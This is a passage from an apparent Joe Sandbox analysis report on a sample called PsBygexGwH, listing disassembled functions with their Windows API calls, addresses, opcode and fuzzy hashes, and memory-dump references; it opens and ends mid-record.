Instruction Fuzzy Hash: 09217E71A04618EADB209FA0CC85BEE7BB9FF14724F108216E929EB1C0E7708985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001A0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 001A0951
GetForegroundWindow.USER32 ref: 001A0968
GetDC.USER32(00000000), ref: 001A09A4
GetPixel.GDI32(00000000,?,00000003), ref: 001A09B0
ReleaseDC.USER32(00000000,00000003), ref: 001A09E8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 26553b64ec76f6a4f92980e8413926bbda378e5d0d31f7bc3b324b2960b96cb5
Instruction ID: 8d2c07717d48ff39a5bd8b3940080dc5767d85a7f61a93ab81c0ccdc94b4c5b9
Opcode Fuzzy Hash: 26553b64ec76f6a4f92980e8413926bbda378e5d0d31f7bc3b324b2960b96cb5
Instruction Fuzzy Hash: F7218135600214AFD704EF69DC85AAEBBE9EF59700F048168F84AD7752CB30AC44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0015CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0015CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015CDE9

Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0015CE0F
_free.LIBCMT ref: 0015CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0015CE31

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 524770535b68a61fe69a464cd1d3500be623d6fdc95ae2915f3b68ef9b694626
Instruction ID: 4c8b7f35ac4f3a34da8458be75962dad3e0e69055e3191389b1632e6d2f5b44d
Opcode Fuzzy Hash: 524770535b68a61fe69a464cd1d3500be623d6fdc95ae2915f3b68ef9b694626
Instruction Fuzzy Hash: AE018872601315FF23211EBA6C4AD7B6D6DEFC6BA23150229FD25DB211DB618D0581F0

Uniqueness

Uniqueness Score: -1.00%

Function 00139639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00139693
SelectObject.GDI32(?,00000000), ref: 001396A2
BeginPath.GDI32(?), ref: 001396B9
SelectObject.GDI32(?,00000000), ref: 001396E2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 717b7a3f326e80fa57395db106ac17ac1ee8dac52a7cd9a30519f08eb7bc7b0f
Instruction ID: 66f033f119b74d2bbe35aa450f98d1a9778d867bcac2d15b24d4778ca38fed07
Opcode Fuzzy Hash: 717b7a3f326e80fa57395db106ac17ac1ee8dac52a7cd9a30519f08eb7bc7b0f
Instruction Fuzzy Hash: F82149B0802305FBDB119F69ED1ABB93BA9BB50369F104216F814A65A0D3F098D1CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 00185711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00185726
_memcmp.LIBVCRUNTIME ref: 00185744
_memcmp.LIBVCRUNTIME ref: 00185757
_memcmp.LIBVCRUNTIME ref: 0018576F
_memcmp.LIBVCRUNTIME ref: 00185787

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 4312ec623ad871b1202d844ec497b57245c70f80a957ea37be25dce721705d93
Instruction ID: fa45b8840f798960558b43a4ac483b5e1b72b5af8d9f8842a6250ea222d2cc0b
Opcode Fuzzy Hash: 4312ec623ad871b1202d844ec497b57245c70f80a957ea37be25dce721705d93
Instruction Fuzzy Hash: 5901B565641609BBE3086511DE82FFB735FEB313A4F808034FD049A242F760EE518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00152DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0014F2DE,00153863,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6), ref: 00152DFD
_free.LIBCMT ref: 00152E32
_free.LIBCMT ref: 00152E59
SetLastError.KERNEL32(00000000,00121129), ref: 00152E66
SetLastError.KERNEL32(00000000,00121129), ref: 00152E6F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bdaeff9b4c03e2cb07d9c81e2dd5576e1322a72976bfe59f255c714d50eac14b
Instruction ID: 7b5e84f30c4ec3e6efb230651e096eb28a1927dd66cec39ac76df239d73eeb28
Opcode Fuzzy Hash: bdaeff9b4c03e2cb07d9c81e2dd5576e1322a72976bfe59f255c714d50eac14b
Instruction Fuzzy Hash: CE01F933105A00E7C61267746C87D6B2699EBE33A7B254129FC31AF292EF309C4D4160

Uniqueness

Uniqueness Score: -1.00%

Function 0018000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?,?,0018035E), ref: 0018002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?), ref: 00180064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180070

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: ed5c76a7100a61f89bd8f6366e0763f92e0eb5e4d652875ab9a0d7ba1e175fde
Instruction ID: 99cd4d3f0baf23aee3093f49909608fb19cc76e8b708c4b3ce75199dd2274bf4
Opcode Fuzzy Hash: ed5c76a7100a61f89bd8f6366e0763f92e0eb5e4d652875ab9a0d7ba1e175fde
Instruction Fuzzy Hash: 6C01A272600208BFDB525F68DC44BAA7BEDEF48792F144228F905D6210D771DE849BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0018E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0018E9A5
Sleep.KERNEL32(00000000), ref: 0018E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0018E9B7
Sleep.KERNEL32 ref: 0018E9F3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7c5af8d79c94e826202b4f562fc6c0c4eb5b967f50fdbe8385fb3161419f858d
Instruction ID: 83d4b9e9642f6b8bbb7738cecf30be5fe61e2eb1012446b9f5fcb7053f34edda
Opcode Fuzzy Hash: 7c5af8d79c94e826202b4f562fc6c0c4eb5b967f50fdbe8385fb3161419f858d
Instruction Fuzzy Hash: CF015E31D0162DDBCF04AFE9DD59AEDBBB8FF09705F010656E542B2241CB709694CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001810F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00181114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 0018112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0018114D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: aef25387393d34d3494023d06166f34cea0ada117978144f5911d590db79ba01
Instruction ID: b5087d913a52a4948e4922472d3f2c99c9dddde722b8b72a01a0be0637a50ccb
Opcode Fuzzy Hash: aef25387393d34d3494023d06166f34cea0ada117978144f5911d590db79ba01
Instruction Fuzzy Hash: 3C01697A200205BFDB115FA8DC4DAAA3B6EEF893A0B240419FA41D3360DB31DD408FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00180FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00180FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00180FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00180FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00180FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00181002

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3488555bcac7b067d1591bd7119c45e9d04c6df725ec2f4108c8d4cd42dd7177
Instruction ID: 5adc5a363e2e814d53750fbeb88aad8c94b56796cd2f6bd6b8eaf1d0353e1fc1
Opcode Fuzzy Hash: 3488555bcac7b067d1591bd7119c45e9d04c6df725ec2f4108c8d4cd42dd7177
Instruction Fuzzy Hash: 80F0497A200301FBDB216FA8DC89F563BADEF89762F204525FA45D6251CB70DC818AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00181014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0018102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00181036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0018104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181062

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 446a4192d463c22eb18b1783f4c97f98cecd34aef7c9053de432c1282615f771
Instruction ID: 68af8d5a6aed7dee5328eb35503faa683b3e1e1933a440b3d542b3a7bb73bc8e
Opcode Fuzzy Hash: 446a4192d463c22eb18b1783f4c97f98cecd34aef7c9053de432c1282615f771
Instruction Fuzzy Hash: A8F0497A200301FBDB216FA8EC49F573BADEF89761F200925FA45D6250CB70D9818AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190324
CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190331
CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 0019033E
CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 0019034B
CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190358
CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190365

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8f0187ddaf9218d9c2584e9944a7eaa379bb7e27239214664c353540bb52641a
Instruction ID: eb52d6704e99047c3660311fdef89ed61618e3e94e5ef78d368c077def766768
Opcode Fuzzy Hash: 8f0187ddaf9218d9c2584e9944a7eaa379bb7e27239214664c353540bb52641a
Instruction Fuzzy Hash: 4401AE72800B159FCB31AF66D880812FBF9BF647153158A3FD19652931C3B1AA98DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0015D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0015D752

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

_free.LIBCMT ref: 0015D764
_free.LIBCMT ref: 0015D776
_free.LIBCMT ref: 0015D788
_free.LIBCMT ref: 0015D79A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 65de9419c7c48e7a73675d5c2b8c41b3871fe182d35a086189ab56463c51291f
Instruction ID: 385042054a37eb950654c0d223bb5220d143ee7d52c37b114e76622409df2983
Opcode Fuzzy Hash: 65de9419c7c48e7a73675d5c2b8c41b3871fe182d35a086189ab56463c51291f
Instruction Fuzzy Hash: 78F04433500258EB8635EB94F9C1C5A7BDDBB0971A7940805F864EF502C730FCC487A0

Uniqueness

Uniqueness Score: -1.00%

Function 00185C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00185C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00185C6F
MessageBeep.USER32(00000000), ref: 00185C87
KillTimer.USER32(?,0000040A), ref: 00185CA3
EndDialog.USER32(?,00000001), ref: 00185CBD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 79c5d9ccb84f53d32e3f051a80a7d329ee0fe3c85fa01c48cc2e873b9c9a6fd8
Instruction ID: 9320e2b3f01cab8a3f56c90e35ffe94fb6e763eb1d43bee0deb68537b5b03576
Opcode Fuzzy Hash: 79c5d9ccb84f53d32e3f051a80a7d329ee0fe3c85fa01c48cc2e873b9c9a6fd8
Instruction Fuzzy Hash: 42018130500B04ABEB256B11ED4EFA677BDFB00B05F001659A583A19E1DBF0AA848F90

Uniqueness

Uniqueness Score: -1.00%

Function 001522A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001522BE

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

_free.LIBCMT ref: 001522D0
_free.LIBCMT ref: 001522E3
_free.LIBCMT ref: 001522F4
_free.LIBCMT ref: 00152305

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0fa6949a4e4f5b3b09fb1be9ee33d7ca75c5b2cd67c567c399ef83c4a6ba30fc
Instruction ID: aa6bcade993958ea0c7965e55cc695b19f68038db358e654d043ffcae4c064c1
Opcode Fuzzy Hash: 0fa6949a4e4f5b3b09fb1be9ee33d7ca75c5b2cd67c567c399ef83c4a6ba30fc
Instruction Fuzzy Hash: BCF03076800120EB8713AF94FC4186C3B64B729B52B100506F830EB772C7310896DFE4

Uniqueness

Uniqueness Score: -1.00%

Function 001395C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001395D4
StrokeAndFillPath.GDI32(?,?,001771F7,00000000,?,?,?), ref: 001395F0
SelectObject.GDI32(?,00000000), ref: 00139603
DeleteObject.GDI32 ref: 00139616
StrokePath.GDI32(?), ref: 00139631

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: b8822fbcf15eb357c1f6e2a95ef48eb9c19c137755d4db730447979660ecf32d
Instruction ID: fc689285bc768a61e1bf51eea18bd2955eecbd149dc121efb2544bd6de856155
Opcode Fuzzy Hash: b8822fbcf15eb357c1f6e2a95ef48eb9c19c137755d4db730447979660ecf32d
Instruction Fuzzy Hash: 33F014B4006208EBDB266F69ED18B793B65BB1032AF048314F465658F0C7B089D5DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00150F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 001510F9
__freea.LIBCMT ref: 00151117

Part of subcall function 00151537: _free.LIBCMT ref: 0015154F

Strings

a/p, xrefs: 001511DE
am/pm, xrefs: 0015117A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 532cfd26fcfaf2260ea7bf46b6694051eb68bd97bedad71d38575711c126dcd5
Instruction ID: 2207688703e1856301f8c964c2073a0ccd5383c6687b518c2dcad0b06c84c5e7
Opcode Fuzzy Hash: 532cfd26fcfaf2260ea7bf46b6694051eb68bd97bedad71d38575711c126dcd5
Instruction Fuzzy Hash: A3D13431900206EACB2A9F68C8A5BFEB7B1FF05712F250159ED319F690D3359D88CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

